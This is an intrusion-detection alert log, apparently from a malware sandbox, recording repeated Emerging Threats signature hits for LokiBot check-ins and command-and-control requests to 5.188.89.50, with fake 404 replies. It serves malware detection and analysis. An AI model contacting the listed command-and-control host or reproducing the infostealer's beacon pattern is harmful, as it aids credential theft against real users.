                    09/28/21-06:51:23.883186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.225.188.89.50
                    09/28/21-06:51:24.245244TCP2025483ET TROJAN LokiBot Fake 404 Response80492445.188.89.50192.168.2.22
                    09/28/21-06:51:24.517036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.868451TCP2025483ET TROJAN LokiBot Fake 404 Response80492455.188.89.50192.168.2.22
                    09/28/21-06:51:25.124484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.488807TCP2025483ET TROJAN LokiBot Fake 404 Response80492465.188.89.50192.168.2.22
                    09/28/21-06:51:25.756368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.225.188.89.50
                    09/28/21-06:51:26.115351TCP2025483ET TROJAN LokiBot Fake 404 Response80492475.188.89.50192.168.2.22
                    09/28/21-06:51:26.383897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.801508TCP2025483ET TROJAN LokiBot Fake 404 Response80492485.188.89.50192.168.2.22
                    09/28/21-06:51:27.057486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.408521TCP2025483ET TROJAN LokiBot Fake 404 Response80492495.188.89.50192.168.2.22
                    09/28/21-06:51:27.673999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.225.188.89.50
                    09/28/21-06:51:28.019418TCP2025483ET TROJAN LokiBot Fake 404 Response80492505.188.89.50192.168.2.22
                    09/28/21-06:51:28.260433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.260433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.260433TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.260433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.225.188.89.50
                    09/28/21-06:51:28.604409TCP2025483ET TROJAN LokiBot Fake 404 Response80492515.188.89.50192.168.2.22
                    09/28/21-06:51:28.882332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.225.188.89.50
                    09/28/21-06:51:28.882332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.225.188.89.50
                    09/28/21-06:51:28.882332TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.225.188.89.50
                    09/28/21-06:51:28.882332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.225.188.89.50
                    09/28/21-06:51:29.232880TCP2025483ET TROJAN LokiBot Fake 404 Response80492525.188.89.50192.168.2.22
                    09/28/21-06:51:29.484912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.484912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.484912TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.484912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.225.188.89.50
                    09/28/21-06:51:29.838618TCP2025483ET TROJAN LokiBot Fake 404 Response80492535.188.89.50192.168.2.22
                    09/28/21-06:51:30.105086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.105086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.105086TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.105086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.225.188.89.50
                    09/28/21-06:51:30.459973TCP2025483ET TROJAN LokiBot Fake 404 Response80492545.188.89.50192.168.2.22
                    09/28/21-06:51:30.722784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.225.188.89.50
                    09/28/21-06:51:30.722784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.225.188.89.50
                    09/28/21-06:51:30.722784TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.225.188.89.50
                    09/28/21-06:51:30.722784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.225.188.89.50
                    09/28/21-06:51:31.087202TCP2025483ET TROJAN LokiBot Fake 404 Response80492555.188.89.50192.168.2.22
                    09/28/21-06:51:31.353110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.353110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.353110TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.353110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.225.188.89.50
                    09/28/21-06:51:31.712104TCP2025483ET TROJAN LokiBot Fake 404 Response80492565.188.89.50192.168.2.22
                    09/28/21-06:51:31.987027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.225.188.89.50
                    09/28/21-06:51:31.987027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.225.188.89.50
                    09/28/21-06:51:31.987027TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.225.188.89.50
                    09/28/21-06:51:31.987027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.225.188.89.50
                    09/28/21-06:51:32.343318TCP2025483ET TROJAN LokiBot Fake 404 Response80492575.188.89.50192.168.2.22
                    09/28/21-06:51:32.641426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.641426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.641426TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.641426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.225.188.89.50
                    09/28/21-06:51:32.997788TCP2025483ET TROJAN LokiBot Fake 404 Response80492585.188.89.50192.168.2.22
                    09/28/21-06:51:33.247393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.247393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.247393TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.247393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.225.188.89.50
                    09/28/21-06:51:33.614152TCP2025483ET TROJAN LokiBot Fake 404 Response80492595.188.89.50192.168.2.22
                    09/28/21-06:51:33.897538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.225.188.89.50
                    09/28/21-06:51:33.897538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.225.188.89.50
                    09/28/21-06:51:33.897538TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.225.188.89.50
                    09/28/21-06:51:33.897538TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.225.188.89.50
                    09/28/21-06:51:34.259139TCP2025483ET TROJAN LokiBot Fake 404 Response80492605.188.89.50192.168.2.22
                    09/28/21-06:51:34.520465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.520465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.520465TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.520465TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.225.188.89.50
                    09/28/21-06:51:34.880407TCP2025483ET TROJAN LokiBot Fake 404 Response80492615.188.89.50192.168.2.22
                    09/28/21-06:51:35.158359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.158359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.158359TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.158359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.225.188.89.50
                    09/28/21-06:51:35.502118TCP2025483ET TROJAN LokiBot Fake 404 Response80492625.188.89.50192.168.2.22
                    09/28/21-06:51:35.771485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926380192.168.2.225.188.89.50
                    09/28/21-06:51:35.771485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926380192.168.2.225.188.89.50
                    09/28/21-06:51:35.771485TCP2025381ET TROJAN LokiBot Checkin4926380192.168.2.225.188.89.50
                    09/28/21-06:51:35.771485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926380192.168.2.225.188.89.50
                    09/28/21-06:51:36.152520TCP2025483ET TROJAN LokiBot Fake 404 Response80492635.188.89.50192.168.2.22
                    09/28/21-06:51:36.416967TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.416967TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.416967TCP2025381ET TROJAN LokiBot Checkin4926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.416967TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926480192.168.2.225.188.89.50
                    09/28/21-06:51:36.777894TCP2025483ET TROJAN LokiBot Fake 404 Response80492645.188.89.50192.168.2.22
                    09/28/21-06:51:37.050080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.050080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.050080TCP2025381ET TROJAN LokiBot Checkin4926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.050080TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926580192.168.2.225.188.89.50
                    09/28/21-06:51:37.397901TCP2025483ET TROJAN LokiBot Fake 404 Response80492655.188.89.50192.168.2.22
                    09/28/21-06:51:37.662483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926680192.168.2.225.188.89.50
                    09/28/21-06:51:37.662483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926680192.168.2.225.188.89.50
                    09/28/21-06:51:37.662483TCP2025381ET TROJAN LokiBot Checkin4926680192.168.2.225.188.89.50
                    09/28/21-06:51:37.662483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926680192.168.2.225.188.89.50
                    09/28/21-06:51:38.023429TCP2025483ET TROJAN LokiBot Fake 404 Response80492665.188.89.50192.168.2.22
                    09/28/21-06:51:38.305464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.305464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.305464TCP2025381ET TROJAN LokiBot Checkin4926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.305464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926780192.168.2.225.188.89.50
                    09/28/21-06:51:38.651947TCP2025483ET TROJAN LokiBot Fake 404 Response80492675.188.89.50192.168.2.22
                    09/28/21-06:51:38.916392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926880192.168.2.225.188.89.50
                    09/28/21-06:51:38.916392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926880192.168.2.225.188.89.50
                    09/28/21-06:51:38.916392TCP2025381ET TROJAN LokiBot Checkin4926880192.168.2.225.188.89.50
                    09/28/21-06:51:38.916392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926880192.168.2.225.188.89.50
                    09/28/21-06:51:39.290411TCP2025483ET TROJAN LokiBot Fake 404 Response80492685.188.89.50192.168.2.22
                    09/28/21-06:51:39.553833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.553833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.553833TCP2025381ET TROJAN LokiBot Checkin4926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.553833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926980192.168.2.225.188.89.50
                    09/28/21-06:51:39.922492TCP2025483ET TROJAN LokiBot Fake 404 Response80492695.188.89.50192.168.2.22
                    09/28/21-06:51:40.503875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.503875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.503875TCP2025381ET TROJAN LokiBot Checkin4927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.503875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927080192.168.2.225.188.89.50
                    09/28/21-06:51:40.856189TCP2025483ET TROJAN LokiBot Fake 404 Response80492705.188.89.50192.168.2.22
                    09/28/21-06:51:41.115944TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.115944TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.115944TCP2025381ET TROJAN LokiBot Checkin4927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.115944TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927180192.168.2.225.188.89.50
                    09/28/21-06:51:41.467151TCP2025483ET TROJAN LokiBot Fake 404 Response80492715.188.89.50192.168.2.22
                    09/28/21-06:51:41.724809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927280192.168.2.225.188.89.50
                    09/28/21-06:51:41.724809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927280192.168.2.225.188.89.50
                    09/28/21-06:51:41.724809TCP2025381ET TROJAN LokiBot Checkin4927280192.168.2.225.188.89.50
                    09/28/21-06:51:41.724809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927280192.168.2.225.188.89.50
                    09/28/21-06:51:42.107495TCP2025483ET TROJAN LokiBot Fake 404 Response80492725.188.89.50192.168.2.22
                    09/28/21-06:51:42.375557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.375557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.375557TCP2025381ET TROJAN LokiBot Checkin4927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.375557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927380192.168.2.225.188.89.50
                    09/28/21-06:51:42.736668TCP2025483ET TROJAN LokiBot Fake 404 Response80492735.188.89.50192.168.2.22
                    09/28/21-06:51:42.995199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927480192.168.2.225.188.89.50
                    09/28/21-06:51:42.995199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927480192.168.2.225.188.89.50
                    09/28/21-06:51:42.995199TCP2025381ET TROJAN LokiBot Checkin4927480192.168.2.225.188.89.50
                    09/28/21-06:51:42.995199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927480192.168.2.225.188.89.50
                    09/28/21-06:51:43.355303TCP2025483ET TROJAN LokiBot Fake 404 Response80492745.188.89.50192.168.2.22
                    09/28/21-06:51:43.599920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.599920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.599920TCP2025381ET TROJAN LokiBot Checkin4927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.599920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927580192.168.2.225.188.89.50
                    09/28/21-06:51:43.963711TCP2025483ET TROJAN LokiBot Fake 404 Response80492755.188.89.50192.168.2.22
                    09/28/21-06:51:44.227576TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.227576TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.227576TCP2025381ET TROJAN LokiBot Checkin4927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.227576TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927680192.168.2.225.188.89.50
                    09/28/21-06:51:44.594955TCP2025483ET TROJAN LokiBot Fake 404 Response80492765.188.89.50192.168.2.22
                    09/28/21-06:51:44.852769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927780192.168.2.225.188.89.50
                    09/28/21-06:51:44.852769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927780192.168.2.225.188.89.50
                    09/28/21-06:51:44.852769TCP2025381ET TROJAN LokiBot Checkin4927780192.168.2.225.188.89.50
                    09/28/21-06:51:44.852769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927780192.168.2.225.188.89.50
                    09/28/21-06:51:45.233310TCP2025483ET TROJAN LokiBot Fake 404 Response80492775.188.89.50192.168.2.22
                    09/28/21-06:51:45.497066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.497066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.497066TCP2025381ET TROJAN LokiBot Checkin4927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.497066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927880192.168.2.225.188.89.50
                    09/28/21-06:51:45.847830TCP2025483ET TROJAN LokiBot Fake 404 Response80492785.188.89.50192.168.2.22
                    09/28/21-06:51:46.098823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.098823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.098823TCP2025381ET TROJAN LokiBot Checkin4927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.098823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927980192.168.2.225.188.89.50
                    09/28/21-06:51:46.445577TCP2025483ET TROJAN LokiBot Fake 404 Response80492795.188.89.50192.168.2.22
                    09/28/21-06:51:46.731312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928080192.168.2.225.188.89.50
                    09/28/21-06:51:46.731312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928080192.168.2.225.188.89.50
                    09/28/21-06:51:46.731312TCP2025381ET TROJAN LokiBot Checkin4928080192.168.2.225.188.89.50
                    09/28/21-06:51:46.731312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928080192.168.2.225.188.89.50
                    09/28/21-06:51:47.075848TCP2025483ET TROJAN LokiBot Fake 404 Response80492805.188.89.50192.168.2.22
                    09/28/21-06:51:47.365121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.365121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.365121TCP2025381ET TROJAN LokiBot Checkin4928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.365121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928180192.168.2.225.188.89.50
                    09/28/21-06:51:47.719933TCP2025483ET TROJAN LokiBot Fake 404 Response80492815.188.89.50192.168.2.22
                    09/28/21-06:51:47.981726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928280192.168.2.225.188.89.50
                    09/28/21-06:51:47.981726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928280192.168.2.225.188.89.50
                    09/28/21-06:51:47.981726TCP2025381ET TROJAN LokiBot Checkin4928280192.168.2.225.188.89.50
                    09/28/21-06:51:47.981726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928280192.168.2.225.188.89.50
                    09/28/21-06:51:48.346430TCP2025483ET TROJAN LokiBot Fake 404 Response80492825.188.89.50192.168.2.22
                    09/28/21-06:51:48.617827TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.617827TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.617827TCP2025381ET TROJAN LokiBot Checkin4928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.617827TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928380192.168.2.225.188.89.50
                    09/28/21-06:51:48.974655TCP2025483ET TROJAN LokiBot Fake 404 Response80492835.188.89.50192.168.2.22
                    09/28/21-06:51:49.261615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.261615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.261615TCP2025381ET TROJAN LokiBot Checkin4928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.261615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928480192.168.2.225.188.89.50
                    09/28/21-06:51:49.615707TCP2025483ET TROJAN LokiBot Fake 404 Response80492845.188.89.50192.168.2.22
                    09/28/21-06:51:49.892301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928580192.168.2.225.188.89.50
                    09/28/21-06:51:49.892301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928580192.168.2.225.188.89.50
                    09/28/21-06:51:49.892301TCP2025381ET TROJAN LokiBot Checkin4928580192.168.2.225.188.89.50
                    09/28/21-06:51:49.892301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928580192.168.2.225.188.89.50
                    09/28/21-06:51:50.238603TCP2025483ET TROJAN LokiBot Fake 404 Response80492855.188.89.50192.168.2.22
                    09/28/21-06:51:50.514179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.514179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.514179TCP2025381ET TROJAN LokiBot Checkin4928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.514179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928680192.168.2.225.188.89.50
                    09/28/21-06:51:50.888614TCP2025483ET TROJAN LokiBot Fake 404 Response80492865.188.89.50192.168.2.22
                    09/28/21-06:51:51.179561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.179561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.179561TCP2025381ET TROJAN LokiBot Checkin4928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.179561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928780192.168.2.225.188.89.50
                    09/28/21-06:51:51.573348TCP2025483ET TROJAN LokiBot Fake 404 Response80492875.188.89.50192.168.2.22
                    09/28/21-06:51:51.856519TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928880192.168.2.225.188.89.50
                    09/28/21-06:51:51.856519TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928880192.168.2.225.188.89.50
                    09/28/21-06:51:51.856519TCP2025381ET TROJAN LokiBot Checkin4928880192.168.2.225.188.89.50
                    09/28/21-06:51:51.856519TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928880192.168.2.225.188.89.50
                    09/28/21-06:51:52.219077TCP2025483ET TROJAN LokiBot Fake 404 Response80492885.188.89.50192.168.2.22
                    09/28/21-06:51:52.480075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.480075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.480075TCP2025381ET TROJAN LokiBot Checkin4928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.480075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928980192.168.2.225.188.89.50
                    09/28/21-06:51:52.847076TCP2025483ET TROJAN LokiBot Fake 404 Response80492895.188.89.50192.168.2.22
                    09/28/21-06:51:53.107025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929080192.168.2.225.188.89.50
                    09/28/21-06:51:53.107025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929080192.168.2.225.188.89.50
                    09/28/21-06:51:53.107025TCP2025381ET TROJAN LokiBot Checkin4929080192.168.2.225.188.89.50
                    09/28/21-06:51:53.107025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929080192.168.2.225.188.89.50
                    09/28/21-06:51:53.463998TCP2025483ET TROJAN LokiBot Fake 404 Response80492905.188.89.50192.168.2.22
                    09/28/21-06:51:53.732530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929180192.168.2.225.188.89.50
                    09/28/21-06:51:53.732530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929180192.168.2.225.188.89.50
                    09/28/21-06:51:53.732530TCP2025381ET TROJAN LokiBot Checkin4929180192.168.2.225.188.89.50
                    09/28/21-06:51:53.732530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929180192.168.2.225.188.89.50
                    09/28/21-06:51:54.083511TCP2025483ET TROJAN LokiBot Fake 404 Response80492915.188.89.50192.168.2.22
                    09/28/21-06:51:54.342201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929280192.168.2.225.188.89.50
                    09/28/21-06:51:54.342201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929280192.168.2.225.188.89.50
                    09/28/21-06:51:54.342201TCP2025381ET TROJAN LokiBot Checkin4929280192.168.2.225.188.89.50
                    09/28/21-06:51:54.342201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929280192.168.2.225.188.89.50
